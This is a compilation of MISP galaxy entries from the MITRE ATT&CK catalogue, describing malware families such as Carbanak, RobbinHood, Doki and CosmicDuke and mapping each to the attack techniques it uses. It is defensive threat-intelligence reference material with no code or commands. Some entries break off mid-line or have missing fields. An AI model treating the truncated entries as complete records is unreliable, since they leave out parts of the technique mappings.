[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)

The tag is: *misp-galaxy:mitre-malware="Trojan.Mebromi - S0001"*

Trojan.Mebromi - S0001 is also known as:

• Trojan.Mebromi

Trojan.Mebromi - S0001 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0001">https://attack.mitre.org/software/S0001</a></td>
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<td><a href="http://www.symantec.com/connect/blogs/bios-threat-showing-again">http://www.symantec.com/connect/blogs/bios-threat-showing-again</a></td>
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</table>
ANDROIDOS_ANSERVER.A - S0310

[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)

The tag is: misp-galaxy:mitre-malware="ANDROIDOS_ANSERVER.A - S0310"

ANDROIDOS_ANSERVER.A - S0310 is also known as:

- ANDROIDOS_ANSERVER.A

ANDROIDOS_ANSERVER.A - S0310 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0310">https://attack.mitre.org/software/S0310</a></td>
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Agent.btz - S0092

[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)

The tag is: misp-galaxy:mitre-malware="Agent.btz - S0092"

Agent.btz - S0092 is also known as:

- Agent.btz

Agent.btz - S0092 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
Backdoor.Oldrea - S0093

[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)

The tag is: **misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093"**

Backdoor.Oldrea - S0093 is also known as:

- Backdoor.Oldrea
- Havex

Backdoor.Oldrea - S0093 has relationships with:

- similar: **misp-galaxy:tool="Havex RAT"** with estimative-language:likelihood-probability="likely"
- uses: **misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"** with estimative-language:likelihood-probability="almost-certain"
- uses: **misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"** with estimative-
Trojan.Karagany - S0094

[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY)

The tag is: `misp-galaxy:mitre-malware="Trojan.Karagany - S0094"

Trojan.Karagany - S0094 is also known as:

- Trojan.Karagany
- xFrost
- Karagany

Trojan.Karagany - S0094 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0094">https://attack.mitre.org/software/S0094</a></td>
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OSX_OCEANLOTUS.D - S0352

[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor with several variants that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: Trend Micro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)

The tag is: `misp-galaxy:mitre-malware="OSX_OCEANLOTUS.D - S0352"`

OSX_OCEANLOTUS.D - S0352 is also known as:

- OSX_OCEANLOTUS.D
- Backdoor.MacOS.OCEANLOTUS.F

OSX_OCEANLOTUS.D - S0352 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"` with `estimative-
• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0352">https://attack.mitre.org/software/S0352</a></td>
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</table>

**OSX/Shlayer - S0402**

[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

The tag is: **misp-galaxy:mitre-malware="OSX/Shlayer - S0402"**

OSX/Shlayer - S0402 is also known as:

- OSX/Shlayer
- Crossrider

OSX/Shlayer - S0402 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0402">https://attack.mitre.org/software/S0402</a></td>
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**T9000 - S0098**

[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)

The tag is: misp-galaxy:mitre-malware="T9000 - S0098"

T9000 - S0098 is also known as:

• T9000

T9000 - S0098 has relationships with:

• similar: misp-galaxy:tool="T9000" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

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**BS2005 - S0014**

[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)

The tag is: misp-galaxy:mitre-malware="BS2005 - S0014"

BS2005 - S0014 is also known as:
• BS2005

BS2005 - S0014 has relationships with:

• similar: misp-galaxy:tool="Hoardy" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0014">https://attack.mitre.org/software/S0014</a></td>
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</table>

Sys10 - S0060

[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="Sys10 - S0060"

Sys10 - S0060 is also known as:

• Sys10

Sys10 - S0060 has relationships with:

• similar: misp-galaxy:malpedia="Sys10" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4453. Table References
Lurid - S0010

[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)

The tag is: `misp-galaxy:mitre-malware="Lurid - S0010"`

Lurid - S0010 is also known as:

- Lurid
- Enfal

Lurid - S0010 has relationships with:

- similar: `misp-galaxy:malpedia="Enfal"` with estimative-language:likelihood-probability="likely"

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<td><a href="https://attack.mitre.org/software/S0010">https://attack.mitre.org/software/S0010</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html">https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html</a></td>
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</table>

Dipsind - S0200

[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)

The tag is: `misp-galaxy:mitre-malware="Dipsind - S0200"`

Dipsind - S0200 is also known as:

- Dipsind
Dipsind - S0200 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0200">https://attack.mitre.org/software/S0200</a></td>
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<td><a href="https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf">https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf</a></td>
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</table>

**DressCode - S0300**

[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)

The tag is: misp-galaxy:mitre-malware="DressCode - S0300"

DressCode - S0300 is also known as:

- DressCode

DressCode - S0300 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428" with estimative-language:likelihood-probability="almost-certain"

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Carbanak - S0030

Carbanak - S0030 is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)

The tag is: `misp-galaxy:mitre-malware="Carbanak - S0030"`

Carbanak - S0030 is also known as:
- Carbanak
- Anunak

Carbanak - S0030 has relationships with:

- similar: `misp-galaxy:malpedia="Carbanak"` with `estimative-language:likelihood-probability="likely"

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with `estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0030">https://attack.mitre.org/software/S0030</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html">https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html</a></td>
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**RIPTIDE - S0003**

[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)

The tag is: `misp-galaxy:mitre-malware="RIPTIDE - S0003"`

RIPTIDE - S0003 is also known as:

• RIPTIDE

RIPTIDE - S0003 has relationships with:

• similar: misp-galaxy:tool="Etumbot" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
TinyZBot - S0004

[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)

The tag is: `misp-galaxy:mitre-malware="TinyZBot - S0004"`

TinyZBot - S0004 is also known as:

- TinyZBot

TinyZBot - S0004 has relationships with:

- similar: `misp-galaxy:tool="TinyZBot"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
RobbinHood - S0400

[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network. (Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)

The tag is: `misp-galaxy:mitre-malware="RobbinHood - S0400"`

RobbinHood - S0400 is also known as:

- RobbinHood

RobbinHood - S0400 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"` with `estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0400">https://attack.mitre.org/software/S0400</a></td>
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CosmicDuke - S0050

[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)

The tag is: `misp-galaxy:mitre-malware="CosmicDuke - S0050"`
CosmicDuke - S0050 is also known as:

- CosmicDuke
- TinyBaron
- BotgenStudios
- NemesisGemina

CosmicDuke - S0050 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
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**Doki - S0600**

[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [Ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)

The tag is: `misp-galaxy:mitre-malware="Doki - S0600"`

Doki - S0600 is also known as:

- Doki

Doki - S0600 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Escape to Host - T1611"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deploy Container - T1610"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/">https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/</a></td>
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**HTTPBrowser - S0070**

[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)

The tag is: *misp-galaxy:mitre-malware="HTTPBrowser - S0070"*

HTTPBrowser - S0070 is also known as:

• HTTPBrowser
• Token Control
• HttpDump

HTTPBrowser - S0070 has relationships with:

• similar: misp-galaxy:tool="HTTPBrowser" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/">https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/</a></td>
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**Mivast - S0080**

[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)

The tag is: *misp-galaxy:mitre-malware="Mivast - S0080"*

Mivast - S0080 is also known as:

- Mivast

Mivast - S0080 has relationships with:
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<td><a href="https://attack.mitre.org/software/S0080">https://attack.mitre.org/software/S0080</a></td>
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**Hikit - S0009**

[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom) (Citation: FireEye Hikit Rootkit)

The tag is: `misp-galaxy:mitre-malware="Hikit - S0009"`

Hikit - S0009 is also known as:

- Hikit

Hikit - S0009 has relationships with:

- similar: `misp-galaxy:tool="Hikit"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Rootkit - T1014"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"


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Rover - S0090

[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)

The tag is: `misp-galaxy:mitre-malware="Rover - S0090"`

Rover - S0090 is also known as:

• Rover

Rover - S0090 has relationships with:

• similar: misp-galaxy:malpedia="Rover" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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**Taidoor - S0011**

[Taidoor](https://attack.mitre.org/software/S0011) is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)

The tag is: *misp-galaxy:mitre-malware="Taidoor - S0011"*

Taidoor - S0011 is also known as:

• Taidoor

Taidoor - S0011 has relationships with:

• similar: misp-galaxy:tool="Taidoor" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

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**WEBC2 - S0109**

[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server.
